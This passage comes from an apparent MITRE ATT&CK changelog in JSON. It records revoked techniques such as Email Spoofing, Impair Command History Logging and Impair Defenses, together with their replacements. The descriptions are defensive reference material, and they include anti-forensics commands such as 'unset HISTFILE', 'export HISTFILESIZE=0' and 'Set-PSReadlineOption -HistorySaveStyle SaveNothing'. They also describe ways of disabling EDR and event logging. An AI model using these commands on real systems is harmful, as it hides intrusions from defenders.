                        "Mayuresh Dani, Qualys",
                        "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
                        "Arad Inbar, Fidelis Security"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows",
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "1.3",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:35.297000+00:00\", \"old_value\": \"2025-10-24 17:49:02.550000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--30904c16-39f9-41c6-b01a-500eb8878442",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:53:28.276000+00:00",
                        "modified": "2026-04-22 15:44:42.756000+00:00",
                        "name": "Downgrade Attack",
                        "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system\u2019s backward compatibility to force it into less secure modes of operation.\n\nAdversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to impair defenses while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike downgrade attack)(Citation: Google Cloud downgrade attack)(Citation: att_def_ps_logging)\n\nAdversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: CrowdStrike Downgrade attack 2) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1689",
                                "external_id": "T1689"
                            },
                            {
                                "source_name": "SafeBreach",
                                "description": "Alon Leviev. (2024, August 7). Windows Downdate: Downgrade Attacks Using Windows Updates. Retrieved January 8, 2025.",
                                "url": "https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/"
                            },
                            {
                                "source_name": "CrowdStrike Downgrade attack 2",
                                "description": "Bart Lenaerts-Bergmans. (2023, March 13). What are Downgrade Attacks?. Retrieved April 15, 2026.",
                                "url": "https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/downgrade-attack/"
                            },
                            {
                                "source_name": "Targeted SSL Stripping Attacks Are Real",
                                "description": "Check Point. (n.d.). Targeted SSL Stripping Attacks Are Real. Retrieved May 24, 2023.",
                                "url": "https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/"
                            },
                            {
                                "source_name": "CrowdStrike downgrade attack",
                                "description": "Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved April 15, 2026.",
                                "url": "https://www.crowdstrike.com/en-us/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/"
                            },
                            {
                                "source_name": "att_def_ps_logging",
                                "description": "Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.",
                                "url": "https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/"
                            },
                            {
                                "source_name": "Google Cloud downgrade attack",
                                "description": "Nathan Kirk. (2018, June 18). Bring Your Own Land (BYOL) \u2014 A Novel Red Teaming Technique. Retrieved April 15, 2026.",
                                "url": "https://cloud.google.com/blog/topics/threat-intelligence/bring-your-own-land-novel-red-teaming-technique/"
                            },
                            {
                                "source_name": "Praetorian TLS Downgrade Attack 2014",
                                "description": "Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.",
                                "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Arad Inbar, Fidelis Security",
                            "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
                            "Mayuresh Dani, Qualys"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": false,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "macOS",
                            "Windows",
                            "Linux"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e1c2db92-7ae3-4e6a-90b4-157c1c1565cb",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-03-24 16:52:14.061000+00:00",
                    "modified": "2026-04-14 22:54:37.081000+00:00",
                    "name": "Email Spoofing",
                    "description": "Adversaries may fake, or spoof, a sender\u2019s identity by modifying the value of relevant email headers in order to establish contact with victims under false pretenses.(Citation: Proofpoint TA427 April 2024) In addition to actual email content, email headers (such as the FROM header, which contains the email address of the sender) may also be modified. Email clients display these headers when emails appear in a victim's inbox, which may cause modified emails to appear as if they were from the spoofed entity. \n\nThis behavior may succeed when the spoofed entity either does not enable or enforce identity authentication tools such as Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and/or Domain-based Message Authentication, Reporting and Conformance (DMARC).(Citation: Cloudflare DMARC, DKIM, and SPF)(Citation: DMARC-overview)(Citation: Proofpoint-DMARC) Even if SPF and DKIM are configured properly, spoofing may still succeed when a domain sets a weak DMARC policy such as `v=DMARC1; p=none; fo=1;`. This means that while DMARC is technically present, email servers are not instructed to take any filtering action when emails fail authentication checks.(Citation: Proofpoint TA427 April 2024)(Citation: ic3-dprk)\n\nAdversaries may abuse Microsoft 365\u2019s Direct Send functionality to spoof internal users by using internal devices like printers to send emails without authentication.(Citation: Barnea DirectSend) Adversaries may also abuse absent or weakly configured SPF, SKIM, and/or DMARC policies to conceal social engineering attempts(Citation: ic3-dprk) such as [Phishing](https://attack.mitre.org/techniques/T1566). They may also leverage email spoofing for [Impersonation](https://attack.mitre.org/techniques/T1656) of legitimate external individuals and organizations, such as journalists and academics.(Citation: ic3-dprk)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1672",
                            "external_id": "T1672"
                        },
                        {
                            "source_name": "Cloudflare DMARC, DKIM, and SPF",
                            "description": "Cloudflare. (n.d.). What are DMARC, DKIM, and SPF?. Retrieved April 8, 2025.",
                            "url": "https://www.cloudflare.com/learning/email-security/dmarc-dkim-spf/"
                        },
                        {
                            "source_name": "DMARC-overview",
                            "description": "DMARC. (n.d.). Retrieved March 24, 2025.",
                            "url": "https://dmarc.org/overview"
                        },
                        {
                            "source_name": "ic3-dprk",
                            "description": "FBI, State Department, NSA. (2024, May 2). North Korean Actors Exploit Weak DMARC Security Policies to Mask Spearphishing Efforts. Retrieved April 2, 2025.",
                            "url": "https://www.ic3.gov/CSA/2024/240502.pdf"
                        },
                        {
                            "source_name": "Proofpoint TA427 April 2024",
                            "description": "Lesnewich, G. et al. (2024, April 16). From Social Engineering to DMARC Abuse: TA427\u2019s Art of Information Gathering. Retrieved May 3, 2024.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering"
                        },
                        {
                            "source_name": "Proofpoint-DMARC",
                            "description": "Proofpoint. (n.d.). Retrieved March 24, 2025.",
                            "url": "https://www.proofpoint.com/us/threat-reference/dmarc"
                        },
                        {
                            "source_name": "Barnea DirectSend",
                            "description": "Tom Barnea. (2025, September 9). Ongoing Campaign Abuses Microsoft 365\u2019s Direct Send to Deliver Phishing Emails. Retrieved September 24, 2025.",
                            "url": "https://www.varonis.com/blog/direct-send-exploit"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Office Suite",
                        "Windows",
                        "macOS",
                        "Linux"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:37.081000+00:00\", \"old_value\": \"2025-09-24 21:03:46.869000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--fcf5bccf-be7a-48ff-b7a7-8d6019279301",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:54:01.539000+00:00",
                        "modified": "2026-04-22 15:49:23.425000+00:00",
                        "name": "Email Spoofing",
                        "description": "Adversaries may fake, or spoof, a sender\u2019s identity by modifying the value of relevant email headers in order to establish contact with victims under false pretenses.(Citation: Proofpoint TA427 April 2024)\u00a0In addition to actual email content, email headers (such as the FROM header, which contains the email address of the sender) may also be modified. Email clients display these headers when emails appear in a victim's inbox, which may cause modified emails to appear as if they were from the spoofed entity.\n\nEnterprise environments can use Domain-based Message Authentication, Reporting, and Conformance (DMARC) as an email authentication protocol that references results of the Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) configurations. SPF and DKIM are configured separately in DNS: SPF verifies that the sending server is authorized for the domain, while DKIM uses a digital signature to verify email integrity and domain authentication. Together, they validate email authenticity and specify how receiving servers should handle authentication failures. Without enforced identity authentication, adversaries may compromise the integrity of an authentication check with altered headers that would not have otherwise passed.(Citation: Cloudflare DMARC, DKIM, and SPF)(Citation: DMARC-overview)(Citation: Proofpoint-DMARC)\n\nAn example of a weak or absent DMARC policy is `v=DMARC1; p=none; fo=1;`. The `p=none`. The `p=none` indicates no action should be taken, and therefore no filtering action will take place, even if an email fails authentication checks (i.e., SPF and/or DKIM fail). When a DMARC policy indicates no action, the email will still be delivered to the victim\u2019s inbox.(Citation: ic3-dprk) \n\nAdversaries have abused weak or absent DMARC policies to circumvent authentication checks and conceal social engineering attempts. Adversaries can alter email headers to include legitimate domain names with fake usernames or impersonate legitimate users via [Impersonation](https://attack.mitre.org/techniques/T1684/001) for [Phishing](https://attack.mitre.org/techniques/T1566). Additionally, adversaries may abuse Microsoft 365\u2019s Direct Send functionality to spoof internal users by using internal devices like printers to send emails without authentication.(Citation: Barnea DirectSend)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "stealth"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1684/002",
                                "external_id": "T1684.002"
                            },
                            {
                                "source_name": "Cloudflare DMARC, DKIM, and SPF",
                                "description": "Cloudflare. (n.d.). What are DMARC, DKIM, and SPF?. Retrieved April 8, 2025.",
                                "url": "https://www.cloudflare.com/learning/email-security/dmarc-dkim-spf/"
                            },
                            {
                                "source_name": "DMARC-overview",
                                "description": "DMARC. (n.d.). Retrieved March 24, 2025.",
                                "url": "https://dmarc.org/overview"
                            },
                            {
                                "source_name": "ic3-dprk",
                                "description": "FBI, State Department, NSA. (2024, May 2). North Korean Actors Exploit Weak DMARC Security Policies to Mask Spearphishing Efforts. Retrieved April 2, 2025.",
                                "url": "https://www.ic3.gov/CSA/2024/240502.pdf"
                            },
                            {
                                "source_name": "Proofpoint TA427 April 2024",
                                "description": "Lesnewich, G. et al. (2024, April 16). From Social Engineering to DMARC Abuse: TA427\u2019s Art of Information Gathering. Retrieved May 3, 2024.",
                                "url": "https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering"
                            },
                            {
                                "source_name": "Proofpoint-DMARC",
                                "description": "Proofpoint. (n.d.). Retrieved March 24, 2025.",
                                "url": "https://www.proofpoint.com/us/threat-reference/dmarc"
                            },
                            {
                                "source_name": "Barnea DirectSend",
                                "description": "Tom Barnea. (2025, September 9). Ongoing Campaign Abuses Microsoft 365\u2019s Direct Send to Deliver Phishing Emails. Retrieved September 24, 2025.",
                                "url": "https://www.varonis.com/blog/direct-send-exploit"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Linux",
                            "macOS",
                            "Office Suite",
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-21 20:56:06.498000+00:00",
                    "modified": "2026-04-14 22:54:31.686000+00:00",
                    "name": "Impair Command History Logging",
                    "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected. The `HISTFILE` environment variable is also used in some ESXi systems.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)\n\nAdversaries may clear the history environment variable (<code>unset HISTFILE</code>) or set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \u201c ls\u201d will not be saved, but \u201cls\u201d would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. \n\nOn Windows systems, the <code>PSReadLine</code> module tracks commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt</code> by default). Adversaries may change where these logs are saved using <code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause <code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command <code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. <code>no logging</code>).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/003",
                            "external_id": "T1562.003"
                        },
                        {
                            "source_name": "Google Cloud Threat Intelligence ESXi VIBs 2022",
                            "description": "Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence"
                        },
                        {
                            "source_name": "Sophos PowerShell command audit",
                            "description": "jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.",
                            "url": "https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit"
                        },
                        {
                            "source_name": "Microsoft PowerShell Command History",
                            "description": "Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.",
                            "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7"
                        },
                        {
                            "source_name": "Sophos PowerShell Command History Forensics",
                            "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024.",
                            "url": "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Vikas Singh, Sophos",
                        "Emile Kenning, Sophos",
                        "Austin Clark, @c2defense"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.3",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:31.686000+00:00\", \"old_value\": \"2025-10-24 17:49:05.941000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--b831f51c-d22f-4724-bbab-60d056bd1150",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:53:28.653000+00:00",
                        "modified": "2026-04-22 15:45:06.768000+00:00",
                        "name": "Prevent Command History Logging",
                        "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they have done.\n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable `HISTFILE`. When a user logs off a system, this information is flushed to a file in the user's home directory called `~/.bash_history`. The `HISTCONTROL` environment variable keeps track of what should be saved by the history command and eventually into the `~/.bash_history` file when a user logs out. `HISTCONTROL` does not exist by default on macOS, but can be set by the user and will be respected. The `HISTFILE` environment variable is also used in some ESXi systems.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)\n\nAdversaries may clear the history environment variable (`unset HISTFILE`) or set the command history size to zero (`export HISTFILESIZE=0`) to prevent logging of commands. Additionally, `HISTCONTROL` can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". `HISTCONTROL` can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.\n\nOn Windows systems, the `PSReadLine` module tracks commands used in all PowerShell sessions and writes them to a file (`$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt` by default). Adversaries may change where these logs are saved using `Set-PSReadLineOption -HistorySavePath {File Path}`. This will cause `ConsoleHost_history.txt` to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command `Set-PSReadlineOption -HistorySaveStyle SaveNothing`.(Citation: Microsoft about_History prevent command history)(Citation: Sophos PowerShell Command History Forensics)\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. `no logging`).",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1690",
                                "external_id": "T1690"
                            },
                            {
                                "source_name": "Google Cloud Threat Intelligence ESXi VIBs 2022",
                                "description": "Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.",
                                "url": "https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence"
                            },
                            {
                                "source_name": "Microsoft about_History prevent command history",
                                "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                                "url": "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7.6&viewFallbackFrom=powershell-7"
                            },
                            {
                                "source_name": "Sophos PowerShell Command History Forensics",
                                "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024.",
                                "url": "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Austin Clark, @c2defense",
                            "Emile Kenning, Sophos",
                            "Vikas Singh, Sophos"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": false,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "ESXi",
                            "Linux",
                            "macOS",
                            "Network Devices",
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-21 20:22:13.470000+00:00",
                    "modified": "2026-04-14 22:54:52.137000+00:00",
                    "name": "Impair Defenses",
                    "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)\n\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562",
                            "external_id": "T1562"
                        },
                        {
                            "source_name": "Google Cloud Mandiant UNC3886 2024",
                            "description": " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations"
                        },
                        {
                            "source_name": "Emotet shutdown",
                            "description": "The DFIR Report. (2022, November 8). Emotet Strikes Again \u2013 LNK File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.",
                            "url": "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Jamie Williams (U \u03c9 U), PANW Unit 42",
                        "Liran Ravich, CardinalOps"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows",
                        "IaaS",
                        "Linux",
                        "macOS",
                        "Containers",
                        "Network Devices",
                        "Identity Provider",
                        "Office Suite",
                        "ESXi"
                    ],
                    "x_mitre_version": "1.7",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:52.137000+00:00\", \"old_value\": \"2025-10-24 17:48:41.123000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--bbde9781-60aa-4b8a-a911-895b0c1b3872",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:53:26.949000+00:00",
                        "modified": "2026-04-22 15:39:46.202000+00:00",
                        "name": "Disable or Modify Tools",
                        "description": "Adversaries may disable, degrade, or tamper with security tools or applications (e.g., endpoint detection and response (EDR) tools, intrusion detection systems (IDS), antivirus, logging agents, sensors, etc.) to impair or reduce visibility of defensive capabilities. This may include stopping specific services, killing processes, modifying or deleting tool configuration files and Registry keys, or preventing tools from updating. This may also include impairing defenses more broadly by disrupting preventative, detection, and response mechanisms across host, network, and cloud environments.(Citation: SCADAfence_ransomware) \n\nIn addition to directly targeting tools, adversaries may block or manipulate indicators and telemetry used for detection. This includes maliciously disabling or redirecting sensors such as Event Tracing for Windows (ETW), modifying event log configurations (e.g., redirecting Security logs), or interfering with logging pipelines and forwarding mechanisms (e.g., SIEM ingestion).(Citation: Microsoft Lamin Sept 2017)(Citation: ETW Palantir)\n\nMore advanced techniques include leveraging legitimate drivers or debugging mechanisms to render tools non-functional, bypassing anti-tampering protections, and targeting specific defenses such as Sysmon or cloud monitoring agents. Adversaries may also disrupt broader defensive operations, including update mechanisms, logging infrastructure (e.g., syslog), or event aggregation, further degrading an organization\u2019s ability to detect and respond to malicious activity.(Citation: Cocomazzi FIN7 Reboot)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1685",
                                "external_id": "T1685"
                            },
                            {
                                "source_name": "Cocomazzi FIN7 Reboot",
                                "description": "Cocomazzi, Antonio. (2024, July 17). FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks. Retrieved September 24, 2025.",
                                "url": "https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/"
                            },
                            {
                                "source_name": "Microsoft Lamin Sept 2017",
                                "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.",
                                "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A"
                            },
                            {
                                "source_name": "ETW Palantir",
                                "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved April 15, 2026.",
                                "url": "https://blog.palantir.com/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63"
                            },
                            {
                                "source_name": "SCADAfence_ransomware",
                                "description": "Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.",
                                "url": "https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Alex Soler, AttackIQ",
                            "Cian Heasley",
                            "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
                            "Gal Singer, @galsinger29, Team Nautilus Aqua Security",
                            "Gordon Long, LegioX/Zoom, asaurusrex",
                            "Lucas Heiligenstein",
                            "Menachem Goldstein",
